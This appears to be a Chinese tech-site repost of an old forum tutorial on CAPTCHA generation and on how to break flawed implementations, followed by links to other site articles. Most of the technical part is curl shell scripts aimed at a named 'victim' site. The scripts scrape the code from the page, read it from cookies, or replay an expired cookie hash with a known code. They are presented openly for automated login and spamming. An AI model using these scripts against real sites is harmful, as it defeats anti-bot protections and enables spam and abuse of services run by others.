验证码的生成原理及其破解方法
所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息, 输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码技术。
很多验证码实现都有问题。比如直接给出用验证码在网页和cookies中。 验证码在网页中的例子: CODE:
/*
* Filename: authpage.php
* Author: hutuworm
* Date: 2003-04-28
* @Copyleft hutuworm.org
*/ srand((double)microtime()*1000000); //验证用户输入是否和验证码一致
if(isset($HTTP_POST_VARS[’authinput’]))
{
if(strcmp($HTTP_POST_VARS[’authnum’],$HTTP_POST_VARS[’authinput’])==0)
echo "验证成功!";
else
echo "验证失败!";
}
//生成新的四位整数验证码
while(($authnum=rand()000)<1000);
?>
请输入验证码:
>
>
[Copy to clipboard] 以上例子直接将验证码储存在负面中,只需下载页面,得到验证码值就可突破限制。 CODE: #!/bin/sh
curl [url]http://www.vicitm.org/authpage.php[/url]
authinput=`grep ’’ grep.txt | sed -e ’s/[^0-9]//g’` #得到网页中的 authnum
curl [url]http://www.vicitm.org/authpage.php[/url] -d name=hacker -d submit="验证" -d authnum=$authnum [Copy to clipboard] CODE: session_register("authnum");
$authnum = strval(rand("1111","9999"));
setcookie("authnum",$authnum); ...
... if($number != $login_check_number || empty($number))
{
print("校验码不正确!");
die();
}
[Copy to clipboard] 第二种要比上一种聪明一点,把验证码值存放在用户Cookies中。可是由于Cookies是用户可读可写,所以也极易被突破。
CODE: #!/bin/sh
$username=hacker
$password=hackme
curl [url]http://www.vicitm.org/index.php[/url] -c common_cookie # 接受服务器的初始cookies
curl [url]http://www.vicitm.org/get_code.php[/url] -c $username.cook -b common_cookie # 得到验证码,从cookies中
authnum=`grep authnum $username.cook | cut -f7`
curl [url]http://www.victim.org/login.php[/url] -b $username.cook -d authnum=$authnum -d username=$username -d password=$password # 使用 cookies中的验证码登陆 [Copy to clipboard]
更高级的验证码。(好像本论坛的就是这种。。。。)
有一类验证码比以上两种验证码要高级一些,它使用如下算法:
1。服务器生成一个随机hash。
2。使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字,再转化成图片。
3。hash在cookie中被发送到客户端
3。客户以图片输入验证码,进行登录。服务器检查f(hash)=验证码。 特点:因为攻击者不明白服务器所使用的验证码编码算法,所以无法对服务器转来的hash进行直接解析。 对付这种验证码,我们可以使用“过期cookies法”,方法即:保存服务器一次特定的cookies,将其对应验证码记下。在每次发送验证消息时 ,强行扔掉服务器传来的cookies,使用这个已被使用过的cookies以及验证码。就好比,一张电话充值卡可以用多次一样。 如:
先从服务器上下载一张验证码图片:
curl http://www.victim.org/get_code.php -c cookie -o auth.png
人工阅读,得到$savecookie(cookie文件中的hash)和$authnum(验证码)。
机器人突破验证时,扔掉服务器给的hash,强制使用$savecookie和$authnum进行突破
CODE: $savecookie=294b506f05f896dcbb3a0dde86a5e36c
$num=7701
$username=hacker
$password=hackme curl [url]http://www.victim.org/index.php[/url] -c $username.cookie # 得到初始化cookies,以及session id
grep -v authhash $username.cookie > tmp.$username # 扔掉服务器给你的hash
echo "[url]www.victim.org[/url] FALSE / FALSE 0 hash $savecookie" >> tmp.$username # 强行使用过期hash 和验证码
mv tmp.$username $username.cookie
curl [url]http://www.victim.org/login.php[/url] -b $username.cookie -c $username.cookie -d username=$username -d password=$password -dauthnum=$num # 使用过期验证码登陆。
#登陆成功,去疯狂灌水。。。。。。 [Copy to clipboard]
最高级的验证码。
它使用如下方法:
1。服务器通过用户相关信息(IP,SID等等)生成一个随机hash。
2。使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字。
3。hash不再发送给客户端。它被保存到本地数据库(通常是SESSIONS,有关用户IP等信息),并由一个序列号seq所指向。(这个seq也可以 是session id)
4。seq被作为cookies发送给客户端。
5。客户以图片输入验证码。
5。服务器验证方法:服务器并不检查f(hash)==验证码,而是去读取数据库中期望的验证码。。如果用户输入与期望值相同,则验证 成功。有些服务器可能还会seq与session id之间的关系进行验继续进行验证。
6。一旦用户进行了验证操作或重新获取验证码,而是服务器将对数据库中的hash值替换成新的,老值失效过期。 特点:
×过期:由于服务器只期望保存在当前数据库中的验证码,所以无法使用“过期”的验证码(因为已被新验证码所替换)。
×高强度:只发送seq,而hash被保存在本地,所以也极难破译出f(hash)函数。 弱点:OCR(光学识别) seq劫持 “验证码”DOS(对某些seq进行反复请求,导致某些用户无法进行正常验证)
对付这种验证码我没有什么好的方法,简便的方法就是自行下载验证码,并给用户显示后登陆。这种适用只验证一次的场合。如登陆时验证。
CODE: curl [url]http://www.victim.org/get_code.php[/url] -c validate.png -c validcode_cookie # 得到验证码图片,和对应seq。
seq=`grep seq validcode_cookie | cut -f7`
echo -n 请输入validate.png中的验证码:
read valid_number # 输入验证码
# 登陆,并进行某种自动化操作,如疯狂灌水。
什么是手机病毒?手机病毒怎么传播?
手机病毒是病毒的一个分支,虽然其存在只有短短数年,但在将来很可能会随着3G的推广而大量涌现。病毒类型:手机病毒病毒目的:破坏手机系统,狂发短信等手机病毒的始作俑者我用手机的时间很长了,大概在上世纪90
详情2018-01-07 10:13:29责编:llp 来源:驱动管家人们需要知道有关后门程序的三大技术知识
曾经饱受木马、后门(以下统称后门)侵害的人们都不会忘记机器被破坏后的惨象,于是人们展开了积极的防御工作,从补丁到防火墙,恨不得连网线都加个验证器,在多种多样的防御手法夹攻下,一大批后门倒下了,菜鸟们
详情2018-01-06 18:19:03责编:llp 来源:驱动管家为你讲解怎么在mac系统加密pdf文件?
我上班的时候经常使用不同的文字处理器和文本编辑软件。我写好的大部分文档都用很流行的那种(尤其是Windows用户常用的)选项来生成,也就是用“打印-〉保存成PDF”。很多情况下,有些个人的PDF文档,我需要进行加密。 很多工具,比如Adobe Acrobat都能给PDF文件设
详情2018-01-13 11:34:18责编:llp 来源:驱动管家心脏出血漏洞检测 心脏出血漏洞检测软件
小编带来了心脏出血漏洞检测软件下载地址,大家可以下载心脏出血漏洞一键检测app,为了我们账户的安全,大家都可以检测一下自己的手机是否存在心脏出血漏洞哦~尽管“心脏出血”是一个网络漏洞,但是某些手机App通
详情2018-01-07 08:24:37责编:llp 来源:驱动管家dns被劫持怎么看?路由器dns被劫持怎么判断?
怎么看dns是否被劫持?一般来说,DNS被劫持有2种情况,一种是路由器DNS被劫持,另外一种是电脑DNS被劫持。针对这2种DNS劫持,下面分别介绍下如何查看。一、怎么看电脑DNS是否被劫持1、在电脑桌面右下角的网络图标
详情2018-01-08 11:20:40责编:llp 来源:驱动管家什么是非对称加密?什么是对称加密?
今天刚好为站点的后台弄了下https,就来分享我了解的吧。密码学最早可以追溯到古希腊罗马时代,那时的加密方法很简单:替换字母。早期的密码学:古希腊人用一种叫 Scytale 的工具加密。更快的工具是 transposi
详情2018-01-15 17:27:37责编:llp 来源:驱动管家黑客入门教程 黑客入门的知识大讲解
第一节、黑客的种类和行为以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵
详情2018-01-16 08:54:11责编:llp 来源:驱动管家什么是后门程序?后门程序有哪些分类?
后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其他电脑。后门是一种
详情2018-01-08 13:34:17责编:llp 来源:驱动管家shell脚本怎么监控mysol服务器?shell脚本监控mysol服务器的步骤
监控MySQL服务是否正常,通常的思路为:检查3306端口是否启动,ps查看mysqld进程是否启动,命令行登录mysql执行语句返回结果,php或jsp程序检测(需要开发人员开发程序)等等;方法1:监听3306端口方法2:查看mys
详情2018-01-05 11:04:57责编:llp 来源:驱动管家如何通过135端口入侵网站?135端口入侵的方法大揭秘
协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码;
详情2018-01-05 10:48:26责编:llp 来源:驱动管家
- 笔记本想要扩容时该怎么办?笔记本内存条可以通用吗?
- outlook邮箱可以自动抄送吗?outlook邮箱自动抄送怎么设置?
- 笔记本光驱可以这样换成外置光驱你知道吗
- 手机不小心刷机成砖头了怎么办?完美刷机软件修复
- 【游戏资讯】Steam第三方授权登录异常 国服《绝地求生》老兵绑定失败
- 【吃鸡技巧】怎么拉枪线?《绝地求生》拉枪线教学
- 无线路由器密码想要修改怎么操作
- 显示桌面快捷键在ubuntu系统上可以用这个办法添加
- 什么是美版iphone5?美版iphone5和港版的有哪些区别?
- sim卡剪卡教程 sim卡剪卡先要判断手机合适哪种sim卡
- 内存降频是怎么回事?电脑内存为什么会自动降频?
- 光纤猫设置在哪儿操作?华为HG8245光纤猫路由器设置方法?
- 有哪些破解oracle数据库密码的方法?如何破解oracle数据库的密码?
- 你知道流氓软件的代码是怎么样的吗?流氓软件的代码介绍
- WiFi共享大师是怎么用的?WiFi共享大师使用方法是什么?
- outlook邮箱注册流程是什么?outlook邮箱注册方法
- 更新鼠标驱动的操作就是这么简单
- 显卡驱动怎么更新?这些办法可以帮到你
- 【游戏资讯】腾讯公布《绝地求生》国服五大反外挂计划 内外组合严打外挂市场
- c盘满了怎么办?赶紧给你的c盘清理内存呀